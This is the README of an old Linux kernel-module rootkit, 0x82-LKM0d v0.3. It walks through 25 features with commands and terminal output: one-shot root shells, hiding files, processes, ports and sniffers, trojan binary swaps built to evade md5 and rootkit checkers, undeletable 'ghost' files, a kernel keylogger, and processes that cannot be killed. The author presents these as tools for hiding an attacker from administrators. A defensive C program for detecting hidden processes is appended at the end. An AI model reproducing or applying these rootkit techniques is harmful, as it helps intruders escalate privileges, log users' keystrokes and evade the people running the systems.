0x82-LKM0d v0.3 by x82

0x82-LKM0d is a rootkit for 2.x kernels. I developed it simply for my own convenience.
Version 0.3 was not developed with distribution in mind. (To be precise, this is v0.3.0.)
Because of that, the src may be messy, and some parts of the implementation may have no
practical use (?) on other servers.

A drawback of kernel-based rootkits is that they are not dynamic (?) the way user-level
programs are. They are mostly static, and very few parts ask for user input.
There may be several reasons for this, but one is that when the kernel depends on
user-supplied input, mishandling it is likely to kill the kernel.
Once the kernel dies, the system cannot be recovered. (The fix is to reboot.)

In the 0x82-LKM0d rootkit, most of what happens in the kernel is decided by user input.
It can therefore be called *very* dynamic.
The implementation is very simple, but I will explain it briefly.

First, there is a user program, designed to communicate with the program installed in
the kernel. When it receives a particular command from the user, it passes the command
contents to a particular system call so that the input is handled according to its role,
and the kernel takes the incoming input and processes it for that purpose.

+--------------------------------------------+
|                User program                |   Application level
+--------------------------------------------+
+---|-|-|-----------|-|-|------------|-|-|---+
|   V V V           V V V            V V V   |
|                System Call                 |
+----------|-|---------------|-|-------------+   Kernel level
+----------|-|---------------|-|-------------+
|          V V               V V             |
|      (FS), (MM), (Dev), (Task), (Net)      |
+--------------------|-|---------------------+
                     V V
   ... ...  (Driver), (Mem), (CPU)  ... ...      Hardware level

This structure is possible thanks to the Linux kernel, which offers the advantages of a
microkernel. Of course the Linux kernel is a monolithic kernel, so the implemented code
is loaded into kernel space, not user space.

In any case, I will describe the features developed so far one by one.
Newly developed parts will be added as they come.

{0}: get root mode.

This is a feature that kernel-based rootkits generally have.
It differs slightly from the older approach of obtaining root privileges by hooking the
getuid() function. It grants root privileges for a single use; to run a shell, execute
it as follows.

./mod [selection number] [path of the command to run]

--
[x82@test LKM]$ id
uid=500(x82) gid=500(x82) groups=500(x82)
[x82@test LKM]$ ./mod 0 /bin/sh
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, get root mode.
executing, /bin/sh program.
Ok, Have a nice day!
sh-2.04# id
uid=0(root) gid=0(root) groups=500(x82)
sh-2.04# exit
exit
[x82@test LKM]$ ./mod 0 /usr/bin/id
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, get root mode.
executing, /usr/bin/id program.
Ok, Have a nice day!
uid=0(root) gid=0(root) groups=500(x82)
[x82@test LKM]$
--

{1}: hidden file & dir mode.

This, too, is a basic feature adopted by many kernel-based backdoors.
The names the user enters are stored in a linked list.
Usage is as follows.

./mod [selection number] [name of the file or directory to hide]

--
[root@test LKM]# ls mod*
mod  mod.c  mod_kern.back  mod_kern.c  mod_kern.h  mod_kern.o
[root@test LKM]# ./mod 1 mod
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, hidden file & dir mode.
hidding, mod file & dir.
Ok, Have a nice day!
[root@test LKM]# ls mod*
mod.c  mod_kern.back  mod_kern.c  mod_kern.h  mod_kern.o
[root@test LKM]#
--

I hid the program named mod. Well, it hides reasonably well. :-)

{2}: unhidden file & dir mode.
This feature restores files and directories hidden through feature 1 so that they can
be seen normally again. Usage is as follows.

./mod [selection number] [name of the file or directory to restore]

--
[root@test LKM]# ls mod*
mod.c  mod_kern.back  mod_kern.c  mod_kern.h  mod_kern.o
[root@test LKM]# ./mod 2 mod
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, unhidden file & dir mode.
unhidding, mod file & dir.
Ok, Have a nice day!
[root@test LKM]# ls mod*
mod  mod.c  mod_kern.back  mod_kern.c  mod_kern.h  mod_kern.o
[root@test LKM]#
--

With the hidden program released, it is visible again as before.

{3}: all unhidden file & dir mode.

This feature restores all files and directories that were registered and hidden through
feature 1 so that they can be seen normally. Usage is very simple.

./mod [selection number]

--
[root@test LKM]# ./mod 3
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, all unhidden file & dir mode.
all unhidding file & dir.
Ok, Have a nice day!
[root@test LKM]#
--

After this, every file and directory that was hidden on the system is visible again.

{4}: hidden process mode.

This feature hides a running process.
Given the name of the process, it disappears as shown below.

./mod [selection number] [name of the process to hide]

--
[root@test LKM]# ps
  PID TTY          TIME CMD
 1128 pts/1    00:00:00 login
 1155 pts/1    00:00:00 su
 1156 pts/1    00:00:01 bash
 2323 pts/1    00:00:00 ps
[root@test LKM]# ./mod 4 su
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, hidden process mode.
hidding, su process.
Ok, Have a nice day!
[root@test LKM]# ps
  PID TTY          TIME CMD
 1128 pts/1    00:00:00 login
 1156 pts/1    00:00:01 bash
 2325 pts/1    00:00:00 ps
[root@test LKM]#
--

After hiding the running su process, it can no longer be seen with the ps command.

{5}: unhidden process mode.

This feature restores a process hidden through feature 4 so that it is visible again.
Usage is as follows.

./mod [selection number] [name of the process to restore]

--
[root@test LKM]# ps
  PID TTY          TIME CMD
 1128 pts/1    00:00:00 login
 1156 pts/1    00:00:01 bash
 2327 pts/1    00:00:00 ps
[root@test LKM]# ./mod 5 su
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, unhidden process mode.
unhidding, su process.
Ok, Have a nice day!
[root@test LKM]# ps
  PID TTY          TIME CMD
 1128 pts/1    00:00:00 login
 1155 pts/1    00:00:00 su
 1156 pts/1    00:00:01 bash
 2329 pts/1    00:00:00 ps
[root@test LKM]#
--

The hidden su process has been restored and is visible in the ps output again.

{6}: all unhidden process mode.

This feature restores all processes hidden through feature 4 so that they are visible.
The command deletes every hidden process from the linked list.

./mod [selection number]

--
[root@test LKM]# ./mod 6
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, all unhidden process mode.
all unhidding process.
Ok, Have a nice day!
[root@test LKM]#
--

{7}: data print mode.

This feature is currently used for debugging.
It is a command for checking each linked list; the result can be seen in the system
logfile or with the dmesg command.

./mod [selection number]

--
[root@test LKM]# ./mod 7
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, data print mode.
Ok, execute, dmesg command!
[root@test LKM]# dmesg | tail -5
--- file list ---
--- process list ---
--- program link list ---
--- inet link list ---
--- ghost list ---
[root@test LKM]#
--

{8}: program (trojan) link mode.

A trojan that modifies a binary can be discovered by an md5 checksum or by a rootkit
checking tool. This feature was developed for a somewhat cleaner way of swapping
programs. Usage is as follows.

./mod [selection number] [path of the command to be replaced] [path of the command to run instead]

--
[root@test LKM]# ls
Makefile  mod    mod_kern.back  mod_kern.h  p.c
banrl.h   mod.c  mod_kern.c     mod_kern.o  r.c
[root@test LKM]# ./mod 8 /bin/ls /bin/ps
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, program (trojan) link mode.
link mode: /bin/ls--->/bin/ps.
Ok, Have a nice day!
[root@test LKM]# ls
ps: error: Unknown gnu long option.
usage: ps -[Unix98 options]
       ps [BSD-style options]
       ps --[GNU-style long options]
       ps --help for a command summary
[root@test LKM]#
--

The original ls command has been changed to the ps command.
In this way commands can be swapped at the kernel level, which can be safe from
md5 checksums and rootkit checking tools.

{9}: program (trojan) unlink mode.

This feature restores a program changed by feature 8.
Usage is as follows.

./mod [selection number] [path of the replaced command]

--
[root@test LKM]# ls
ps: error: Unknown gnu long option.
usage: ps -[Unix98 options]
       ps [BSD-style options]
       ps --[GNU-style long options]
       ps --help for a command summary
[root@test LKM]# ./mod 9 /bin/ls
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, program (trojan) unlink mode.
unlink mode: /bin/ls.
Ok, Have a nice day!
[root@test LKM]# ls
Makefile  mod    mod_kern.back  mod_kern.h  p.c
banrl.h   mod.c  mod_kern.c     mod_kern.o  r.c
[root@test LKM]#
--

The command has been restored, as shown.

{10}: program (trojan) all unlink mode.

This feature restores all programs changed by feature 8.
Usage is as follows.

./mod [selection number]

--
[root@test LKM]# ./mod 10
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, program (trojan) all unlink mode.
all unlink, program (trojan).
Ok, Have a nice day!
[root@test LKM]#
--

{11}: sniff On/Off mode.

This feature removes the promiscuous mode mark that is shown when a sniffer is running.
When ifconfig is run, the PROMISC mark indicates whether a sniffer is active; this
feature removes that mark. Usage is as follows.

./mod [selection number] [mode number]

Mode number 0 shows the list of selection numbers.
Mode number 1 turns the sniffer hiding feature On.
Mode number 2 turns the sniffer hiding feature Off.

--
[root@test LKM]# ./mod 11 0
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, sniff On/Off mode.
--
{0}: mode list. ex) ./mod 11 0
{1}: On mode. ex) ./mod 11 1
{2}: Off mode. ex) ./mod 11 2
--
[root@test LKM]#
--
[root@test LKM]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:BF:65:55:5E
          inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.127  Mask:255.255.255.128
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:224866 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42354 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          Interrupt:5 Base address:0xe400

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:3924  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0

[root@test LKM]#
--

The PROMISC mark is displayed.
After running the following, the mark is gone.

--
[root@test LKM]# ./mod 11 1
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, sniff On/Off mode.
[!] Select, On mode.
Ok, Have a nice day!
[root@test LKM]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:BF:65:55:5E
          inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.127  Mask:255.255.255.128
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:224963 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42383 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          Interrupt:5 Base address:0xe400

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:3924  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0

[root@test LKM]#
--

The PROMISC mark has been removed.
If mode number 2 is selected, the PROMISC mark appears again.
--
[root@test LKM]# ./mod 11 2
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, sniff On/Off mode.
[!] Select, Off mode.
Ok, Have a nice day!
[root@test LKM]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:BF:65:55:5E
          inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.127  Mask:255.255.255.128
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:225481 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42430 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          Interrupt:5 Base address:0xe400

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:3924  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0

[root@test LKM]#
--

With hiding mode turned Off, the PROMISC mark is visible.

{12}: hidden inet port mode.

This feature hides a port that is in service on the server.
It can hide not only the listening port but also all information about clients
connected to that port.

./mod [selection number] [port number to hide]

--
[root@test LKM]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0    138 xxx.xxx.xxx.xxx:23      yyy.yyy.yyy.yyy:2232    ESTABLISHED
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     238    @0000001d
unix  2      [ ]         DGRAM                    394    /dev/log
unix  0      [ ]         DGRAM                    1397
unix  0      [ ]         DGRAM                    438
[root@test LKM]#
--

Port 23 is open, and the client yyy.yyy.yyy.yyy is currently connected.
Let's hide it.
--
[root@test LKM]# ./mod 12 23
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, hidden inet port mode.
hidden inet port number: 23.
Ok, Have a nice day!
[root@test LKM]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     238    @0000001d
unix  2      [ ]         DGRAM                    394    /dev/log
unix  0      [ ]         DGRAM                    1397
unix  0      [ ]         DGRAM                    438
[root@test LKM]#
--

All information about port 23, which is in service, is now hidden.

{13}: unhidden inet port mode.

Restores a port hidden through feature 12.
The restored service port can be seen again.

./mod [selection number] [port number to restore]

--
[root@test LKM]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     238    @0000001d
unix  2      [ ]         DGRAM                    394    /dev/log
unix  0      [ ]         DGRAM                    1397
unix  0      [ ]         DGRAM                    438
[root@test LKM]# ./mod 13 23
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, unhidden inet port mode.
unhidden inet port number: 23.
Ok, Have a nice day!
[root@test LKM]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0    138 xxx.xxx.xxx.xxx:23      yyy.yyy.yyy.yyy:2232    ESTABLISHED
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     238    @0000001d
unix  2      [ ]         DGRAM                    394    /dev/log
unix  0      [ ]         DGRAM                    1397
unix  0      [ ]         DGRAM                    438
[root@test LKM]#
--

Port 23, which is in service, can be seen again.

{14}: all unhidden inet port mode.

Restores all ports hidden through feature 12.
Usage is as follows.

./mod [selection number]

--
[root@test LKM]# ./mod 14
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, all unhidden inet port mode.
all, unhidden inet port.
Ok, Have a nice day!
[root@test LKM]#
--

{15}: process *id show mode.

This feature shows information about a process.
Given a process number, it reports the process name, uid, euid, suid, fsuid, gid, egid,
sgid, fsgid and so on.

./mod [selection number] [process (pid) number]

--
[root@test LKM]# ps | grep 1156
 1156 pts/1    00:00:01 bash
[root@test LKM]# ./mod 15 1156
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process *id show mode.
process id(pid) number: 1156.
process name: bash.
process uid: 0.
process euid: 0.
process suid: 0.
process fsuid: 0.
process gid: 0.
process egid: 0.
process sgid: 0.
process fsgid: 0.
Ok, Have a nice day!
[root@test LKM]#
--

{16}: process uid alteration mode.

This is a fairly interesting feature that changes the uid of a particular process.
It is designed so that the uid, euid, suid, fsuid and so on of the specified process
number can be changed. For reference, the id information of a process can be checked
with feature 15.

./mod [selection number] [process (pid) number] [uid number to set]

--
[root@test LKM]# ps -aux | grep cat
x82       2427  0.0  0.2  1284  312 pts/0    S    00:53   0:00 ./cat_shadow
[root@test LKM]# ./mod 15 2427
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process *id show mode.
process id(pid) number: 2427.
process name: cat_shadow.
process uid: 500.
process euid: 500.
process suid: 500.
process fsuid: 500.
process gid: 500.
process egid: 500.
process sgid: 500.
process fsgid: 500.
Ok, Have a nice day!
[root@test LKM]# ./mod 16 2427 0
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process uid alteration mode.
process id(pid) number: 2427.
user id(uid) number: 0.
Ok, Have a nice day!
[root@test LKM]# ps -aux | grep cat
root      2427  0.0  0.2  1284  312 pts/0    S    00:53   0:00 ./cat_shadow
[root@test LKM]# ./mod 15 2427
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process *id show mode.
process id(pid) number: 2427.
process name: cat_shadow.
process uid: 0.
process euid: 0.
process suid: 0.
process fsuid: 0.
process gid: 500.
process egid: 500.
process sgid: 500.
process fsgid: 500.
Ok, Have a nice day!
[root@test LKM]#
--

A process running as user x82 (uid=500) is changed to root (uid=0), as shown.

{17}: process gid alteration mode.

This feature changes the gid of a particular process.
It is designed so that the gid, egid, sgid, fsgid and so on of the specified process
number can be changed. For reference, the id information of a process can be checked
with feature 15.

./mod [selection number] [process (pid) number] [gid number to set]

--
[root@test LKM]# ./mod 15 2427
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process *id show mode.
process id(pid) number: 2427.
process name: cat_shadow.
process uid: 0.
process euid: 0.
process suid: 0.
process fsuid: 0.
process gid: 500.
process egid: 500.
process sgid: 500.
process fsgid: 500.
Ok, Have a nice day!
[root@test LKM]# ./mod 17 2427 0
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process gid alteration mode.
process id(pid) number: 2427.
group id(gid) number: 0.
Ok, Have a nice day!
[root@test LKM]# ./mod 15 2427
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, process *id show mode.
process id(pid) number: 2427.
process name: cat_shadow.
process uid: 0.
process euid: 0.
process suid: 0.
process fsuid: 0.
process gid: 0.
process egid: 0.
process sgid: 0.
process fsgid: 0.
Ok, Have a nice day!
[root@test LKM]#
--

Checking the process information shows that the gid has been changed to 0.

{18}: add ghost file & dir mode.

This feature is new in this version of the rootkit and is called the `ghost file system'.
From a security point of view, a ghost file is similar to a system file protection
feature. Once something is added as a ghost file & dir, the added file can no longer be
deleted or modified, and its file information can no longer be obtained.
As a result, even if an administrator discovers a hidden file, it cannot be modified or
deleted, so the rootkit installed on the system is protected.
Usage is as follows.

./mod [selection number] [name of the file to add]

--
[root@test LKM]# ./mod 18 ps
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, add ghost file & dir mode.
add, ps ghost file & dir.
Ok, Have a nice day!
[root@test LKM]# ls -al /bin/ps
?---------    0 root     root            0 Dec 31  1969 /bin/ps
[root@test LKM]# rm -f /bin/ps
rm: cannot remove `/bin/ps'
[root@test LKM]# mv /bin/ps /tmp/
mv: cannot stat `/bin/ps'
[root@test LKM]# cat /bin/ps
cat: /bin/ps: Bad file descriptor
cat: /bin/ps: Bad file descriptor
[root@test LKM]# ps
  PID TTY          TIME CMD
 1128 pts/1    00:00:00 login
 1155 pts/1    00:00:00 su
 1156 pts/1    00:00:01 bash
 2805 pts/1    00:00:00 ps
[root@test LKM]# chmod 777 /bin/ps
chmod: /bin/ps
[root@test LKM]# chown nobody: /bin/ps
chown: /bin/ps: Function not implemented
[root@test LKM]# ls -al /bin/ps
?---------    0 root     root            0 Dec 31  1969 /bin/ps
[root@test LKM]#
--

As shown above, the file cannot be deleted or modified, and it cannot be read either.
In this way a particular file can be protected.

{19}: del ghost file & dir mode.

Releases the ghost file mode activated by feature 18.
Usage is as follows.

./mod [selection number] [name of the file to release]

--
[root@test LKM]# ./mod 19 ps
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, del ghost file & dir mode.
del, ps ghost file & dir.
Ok, Have a nice day!
[root@test LKM]# ls -al /bin/ps
-r-xr-xr-x    1 root     root        65148 Aug 17  2000 /bin/ps
[root@test LKM]#
--

The original ps file has been restored, as shown.

{20}: all del ghost file & dir mode.
Removes from the linked list all files and directories added by feature 18.
Usage is as follows.

./mod [selection number]

--
[root@test LKM]# ./mod 20
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, all del ghost file & dir mode.
all del, ghost file & dir.
Ok, Have a nice day!
[root@test LKM]#
--

{21}: On Key logging mode.

This is a kernel-based key logging feature.
With it, what users type can be saved to a specified file.

./mod [selection number] [path of the file to save to]

--
[root@test LKM]# ./mod 21 /tmp/key_log
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, On Key logging mode.
Keylog file path: /tmp/key_log.
Ok, Have a nice day!
[root@test LKM]# cat /tmp/key_log
[2003/01/19 21:33:06] [pts/0:0] cat /tmp/key_log
[root@test LKM]#
--

The contents are saved to the /tmp/key_log file in real time, as shown.

{22}: Off Key logging mode.

This feature turns off the key logging activated by feature 21.
Usage is as follows.

./mod [selection number]

--
[root@test LKM]# ./mod 22
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, Off Key logging mode.
Keylogging, Off.
Ok, Have a nice day!
[root@test LKM]#
--

{23}: add process protaction mode.

There is a chance that an attacker's process will be discovered by the administrator.
The process protaction mode feature is provided so that the administrator cannot simply
kill a process that has been discovered. Usage is as follows.
./mod [selection number] [process (pid) number]

--
[root@test LKM]# ps
  PID TTY          TIME CMD
 3692 pts/0    00:00:00 login
 3720 pts/0    00:00:00 su
 3721 pts/0    00:00:00 bash
 3916 pts/0    00:00:00 ps
[root@test LKM]# ./mod 23 3720
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, add process protaction mode.
add pid: 3720.
Ok, Have a nice day!
[root@test LKM]# kill -9 3720
[root@test LKM]# ps | grep 3720
 3720 pts/0    00:00:00 su
[root@test LKM]#
--

After designating a particular process and running kill against it, the process does
not die.

{24}: del process protaction mode.

Releases a process that is under the protection mode applied by feature 23.
Usage is as follows.

./mod [selection number] [process (pid) number]

--
[root@test LKM]# ./mod 24 3720
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, del process protaction mode.
del pid: 3720.
Ok, Have a nice day!
[root@test LKM]# kill -9 3720
[test@test LKM]$
--

After releasing the protected process, it is killed, as shown.

{25}: del all process protaction mode.

Releases all processes that are under the protection mode applied by feature 23.
Usage is as follows.

./mod [selection number]

--
[root@test LKM]# ./mod 25
=======================================================================
 Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you
=======================================================================
[!] Select, del all process protaction mode.
del, all pid.
Ok, Have a nice day!
[root@test LKM]#
--

With this, all protected processes have been released.

--
... more features are still being added ...
--

That covers all the features implemented in version v0.3.0.
There are several more features to be added, and the most urgent issue to solve is
designing it so that it can be used on RedHat 9.0 and later versions, which do not
allow the sys_call_table variable to be modified.

Thank you.
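
Defender-side check for the process hiding shown in {4} (added example, not part of the original README or of the 0x82-LKM0d source): it compares the PIDs that a /proc directory listing shows with the PIDs the kernel acknowledges through kill(pid, 0), and reports the difference. It assumes the hiding works by filtering /proc directory listings, which the README does not state; the function names and the PID ceiling of 32768 are illustrative.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

typedef int (*probe_fn)(int pid);      /* returns 1 if the PID exists */
/* View 1: PIDs visible in a directory listing of /proc (what ps reads). */
static int list_proc_pids(const char *dir, int *out, int cap)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    int n = 0;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL && n < cap)
        if (isdigit((unsigned char)e->d_name[0])) out[n++] = atoi(e->d_name);
    closedir(d);
    return n;
}

/* View 2: ask the kernel. Signal 0 sends nothing; EPERM still proves existence. */
static int kill_probe(int pid)
{
    return kill((pid_t)pid, 0) == 0 || errno == EPERM;
}

/* Thread IDs answer kill() but are never listed in /proc; Tgid != id marks one. */
static int is_thread(int pid)
{
    char path[64], line[128];
    int tgid = pid;
    FILE *f;
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    if (!(f = fopen(path, "r"))) return 0;
    while (fgets(line, sizeof line, f))
        if (sscanf(line, "Tgid: %d", &tgid) == 1) break;
    fclose(f);
    return tgid != pid;
}

static int in_set(const int *s, int n, int v)
{
    for (int i = 0; i < n; i++)
        if (s[i] == v) return 1;
    return 0;
}

/* Collect PIDs that answer the probe but are missing from the listing. */
static int cross_view(const int *listed, int n, int max_pid, probe_fn alive,
                      int *hidden, int cap)
{
    int h = 0;
    for (int pid = 1; pid <= max_pid && h < cap; pid++)
        if (alive(pid) && !in_set(listed, n, pid)) hidden[h++] = pid;
    return h;
}

/* Constructed sample: the page's ps listing, where 1155 (su) was hidden. */
static int demo_probe(int pid)
{
    static const int alive[] = {1128, 1155, 1156};
    return in_set(alive, 3, pid);
}

int demo(void)
{
    static const int listed[] = {1128, 1156};
    int hidden[8], n = cross_view(listed, 2, 4096, demo_probe, hidden, 8);
    return n == 1 ? hidden[0] : -1;
}

int main(void)
{
    static int listed[65536];
    int hidden[256], n, h;
    if ((n = list_proc_pids("/proc", listed, 65536)) < 0) return 1;
    h = cross_view(listed, n, 32768, kill_probe, hidden, 256); /* assumed pid_max */
    for (int i = 0; i < h; i++)
        if (!is_thread(hidden[i]))
            printf("pid %d answers kill(0) but is not listed in /proc\n", hidden[i]);
    return 0;
}
```

A process that starts or exits between the two views shows up as a false hit, so list /proc again and re-probe each candidate before treating it as hidden.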